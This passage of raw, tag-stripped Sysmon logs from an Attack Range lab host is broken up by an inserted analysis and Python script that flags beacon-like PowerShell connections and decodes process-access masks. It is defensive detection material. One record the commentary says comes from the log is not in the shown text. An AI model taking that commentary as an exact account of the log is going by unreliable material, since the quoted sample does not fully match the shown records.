Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:24.088{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:24.088{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A15C-6140-8F56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.088{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A15C-6140-8F56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:24.073{B81B27B7-A15C-6140-8F56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.887{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FA43F96691E226D4ED048338765C874,SHA256=447F42F9E306E21FD9191406D265C5FDC69912D898510B5256F419C027669ACD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=015DDB324B7D6FEC05ED8CE29FACCC99,SHA256=15718DDDC8A753803247D3DE9071977FDADBD6440B7AA10E79C6457B3F63DFE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2A179B79A417E69A3AE4E484E058C20,SHA256=0B5747B28ECDB9FE23BFE8488304D7317E49CF2B7F77295FB3970AEC63681A8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:26.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A16AA58341026BABFC69A37265ACF77,SHA256=18BA81C7670CD3BCA32F4771FDED747322FAF91CB45635293CC012ED8444543D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:27.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77EA5C4DF2DEE3D7854C0825B7F6647A,SHA256=9115856D012691E033E1DDDEAC97BC7DA96D2374B7ED456A3BD854BA084E5671,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:57.888{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50582-false10.0.1.12-8000- 23542300x800000000000000036497817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:28.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0241BAC0E7EB52BD80A66A958206DC7A,SHA256=AE6BCFF037D3D179F748BB813416E59984F24F3E6C653FEE5B510C05615CE170,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:28.785{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A52425FC9F77CF8E8C7D70CD8E72FEE6,SHA256=51588C7F2B0E9F3EA1C508803B99E1CCDDBE795FF6AC67F6B8F59861F5787C4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:29.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E1119316D9ED17620511A61699D70A,SHA256=661B513F39074CC8148E92713F096EEF641EB1F2EE288DBA5D5E98646DDA0646,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.440{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50583-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:30.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BA73277CC6ABAC0EA414B4828F0C51,SHA256=CEE9D3707A2190F612147F7FC570FAC8C41D6A0ACFFA961489C06E47F8C7366E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:32.581{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:32.014{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=838FA5AD62ADA3EAC6A45DD62D9ABE71,SHA256=3937A9AD092CE474D2818483F36E2DA425CBF7D53CFE6F498CE981A597A83D2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:33.995{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B0603E918B92823BBBD8E7ACAE616EFF,SHA256=E4CCE7B50B83BA1AD77360B8BF56091AD745046A1E57EBB1DD98442002E522AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036497825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:04.251{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50585-false10.0.1.12-8089- 354300x800000000000000036497824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:03.898{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50584-false10.0.1.12-8000- 23542300x800000000000000036497823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:33.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=909AE65EE83611072F148FED1D790A67,SHA256=E33EB3D5E9B34D917FB6346CFC354F682848D0E64665DBB719BD541428B440D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:04.451{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50586-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:34.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF0E0CE80A8C4BEBBD027466D97C343,SHA256=22FF3990B5E5698E83D802D8DBC41EC395298633C87BD2918C22C2806408B0D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:35.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60678DDD16DD083A916599633199631,SHA256=C2B6163804289AEEABDCED4C4A264E1C0638C398896C845BC741B38129A1F0C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:36.146{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E1426C603F7513F3B8BC6A5AEFCB906,SHA256=8C3F7DFE663352708ABAFEED0E51D0B605ACC281DB020424E77E8E637D14BD70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A169-6140-9156-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
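The records above are Sysmon events with their XML tags stripped, so each record is the System fields (EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer) followed by the EventData fields in schema order with no delimiter: "354300x8000000000000000..." is EventID 3 / Version 5 / Level 4 / Task 3 / Opcode 0, "10341000x80..." is EventID 10, "154100x80..." EventID 1 and "23542300x80..." EventID 23. Two things in this stretch are worth pulling out. First, the three EventID 3 records for powershell.exe (PID 6940, ATTACKRANGE\REED_SCHMIDT) reach 10.0.1.16:443 at 13:19:53.425, 13:19:59.440 and 13:20:04.451, a near-constant 5 to 6 second cadence that is the shape of a beacon, while the Splunk forwarder's own connections to 10.0.1.12 on 8000/8089 are the expected ones. Second, the many EventID 10 ProcessAccess records carry a GrantedAccess mask that decides whether they matter: 0x1400 (svchost.exe via lsm.dll/RPC querying sysmon64.exe) is query-only, 0x1fffff from splunkd.exe to splunk-netmon.exe / splunk-regmon.exe / splunk-powershell.exe coincides with the EventID 1 creation of those children and is the parent's own process handle, and 0x101400 is query plus SYNCHRONIZE. The following is an added example, not code from the page or from Splunk Attack Range: it parses the flattened EventID 3 layout exactly as it appears here (the regex is fitted to this page's field order and is not a general Sysmon parser), scores each (image, user, destination) group for periodicity, and names the bits in a GrantedAccess mask. The six sample records are copied verbatim from the log above; the beacon thresholds (at least three connections, relative jitter at most 0.25) are assumptions chosen for this illustration.

```python
"""Parse the flattened Sysmon EventID 3 records on this page, flag periodic
outbound connections, and decode EventID 10 GrantedAccess masks."""
import re
import statistics
from datetime import datetime

# EventID 3 field order once the XML tags are gone: EventID Version Level Task
# Opcode Keywords EventRecordID Channel Computer RuleName("-") UtcTime
# ProcessGuid ProcessId Image User Protocol Initiated SourceIsIpv6 SourceIp
# SourceHostname SourcePort SourcePortName DestinationIsIpv6 DestinationIp
# DestinationHostname DestinationPort DestinationPortName.  Non-greedy groups
# recover the boundaries the stripped tags used to provide.
NETCONN_RE = re.compile(
    r"^3(?P<version>\d)(?P<level>\d)3(?P<opcode>\d)0x8000000000000000"
    r"(?P<record_id>\d+)Microsoft-Windows-Sysmon/Operational"
    r"(?P<computer>\S+?)-"
    r"(?P<utc>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})"
    r"\{(?P<guid>[0-9A-Fa-f-]+)\}(?P<pid>\d+)"
    r"(?P<image>.+?\.exe)(?P<user>.+?)"
    r"(?P<protocol>tcp|udp)(?P<initiated>true|false)(?P<src_ipv6>true|false)"
    r"(?P<src_ip>\d+\.\d+\.\d+\.\d+)(?P<src_host>.*?)(?P<src_port>\d+)"
    r"(?P<src_portname>[\w-]*?)(?P<dst_ipv6>true|false)"
    r"(?P<dst_ip>\d+\.\d+\.\d+\.\d+)(?P<dst_host>.*?)(?P<dst_port>\d+)"
    r"(?P<dst_portname>[\w-]*)$"
)

# A new record starts after a space at "<EventID><Ver><Level><Task><Opcode>0x8000000000000000<RecordID>Microsoft-Windows-Sysmon/Operational".
RECORD_START = re.compile(r" (?=\d+0x8000000000000000\d+Microsoft-Windows-Sysmon/Operational)")

# Six EventID 3 records copied verbatim from the log on this page.
SAMPLE = [
    r"354300x800000000000000036497799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:53.425{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50581-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036497814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:57.888{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50582-false10.0.1.12-8000-",
    r"354300x800000000000000036497819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.440{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50583-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036497824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:03.898{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50584-false10.0.1.12-8000-",
    r"354300x800000000000000036497825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:04.251{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50585-false10.0.1.12-8089-",
    r"354300x800000000000000036497828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:04.451{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50586-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
]

# Windows PROCESS_* access rights plus the standard rights that appear in
# Sysmon GrantedAccess values (0x1FFFFF is PROCESS_ALL_ACCESS).
PROCESS_RIGHTS = {
    0x0001: "TERMINATE", 0x0002: "CREATE_THREAD", 0x0004: "SET_SESSIONID",
    0x0008: "VM_OPERATION", 0x0010: "VM_READ", 0x0020: "VM_WRITE",
    0x0040: "DUP_HANDLE", 0x0080: "CREATE_PROCESS", 0x0100: "SET_QUOTA",
    0x0200: "SET_INFORMATION", 0x0400: "QUERY_INFORMATION",
    0x0800: "SUSPEND_RESUME", 0x1000: "QUERY_LIMITED_INFORMATION",
    0x2000: "SET_LIMITED_INFORMATION", 0x10000: "DELETE",
    0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}


def split_records(text):
    """Split a run of concatenated records into one string per event."""
    return [r for r in RECORD_START.split(text.strip()) if r]


def parse_netconn(record):
    """Return the EventID 3 fields as a dict, or None for any other event type."""
    m = NETCONN_RE.match(record)
    if not m:
        return None
    d = m.groupdict()
    d["utc"] = datetime.strptime(d["utc"], "%Y-%m-%d %H:%M:%S.%f")
    for k in ("record_id", "pid", "src_port", "dst_port"):
        d[k] = int(d[k])
    return d


def find_beacons(records, min_connections=3, max_jitter=0.25):
    """Group initiated connections by (image, user, dst ip, dst port) and flag
    groups whose inter-connection gaps are regular (pstdev/mean <= max_jitter).
    Thresholds are illustrative, not tuned values."""
    groups = {}
    for rec in records:
        r = parse_netconn(rec)
        if r is None or r["initiated"] != "true":
            continue
        groups.setdefault((r["image"], r["user"], r["dst_ip"], r["dst_port"]), []).append(r["utc"])
    hits = []
    for (image, user, ip, port), times in groups.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else float("inf")
        if jitter <= max_jitter:
            hits.append({"image": image, "user": user, "dst": f"{ip}:{port}", "count": len(times),
                         "mean_interval_s": round(mean, 3), "jitter": round(jitter, 3)})
    return hits


def decode_granted_access(mask):
    """Name the bits in a Sysmon GrantedAccess value such as '0x1400'."""
    value = int(mask, 16) if isinstance(mask, str) else mask
    names = [n for bit, n in sorted(PROCESS_RIGHTS.items()) if value & bit]
    leftover = value & ~sum(PROCESS_RIGHTS)  # keys are distinct bits, so sum == OR
    if leftover:
        names.append(f"UNNAMED_0x{leftover:x}")
    return names


if __name__ == "__main__":
    for hit in find_beacons(split_records(" ".join(SAMPLE))):
        print(hit)
    for mask in ("0x1400", "0x101400", "0x1fffff"):
        print(mask, decode_granted_access(mask))
```

Only the powershell.exe group survives the filter (three connections, mean gap about 5.5 s, relative jitter about 0.09); the two streamfwd.exe connects are too few to score. Three samples is thin evidence on its own, so in practice the periodicity score is a pivot to the surrounding EventID 1 and 11 data for PID 6940 rather than an alert by itself. For the ProcessAccess records, the decoder is the quick triage: masks that include VM_READ or VM_WRITE against a sensitive target are what to look for, and none of the 0x1400 or 0x101400 accesses on this page carry them.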
10341000x800000000000000036497838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 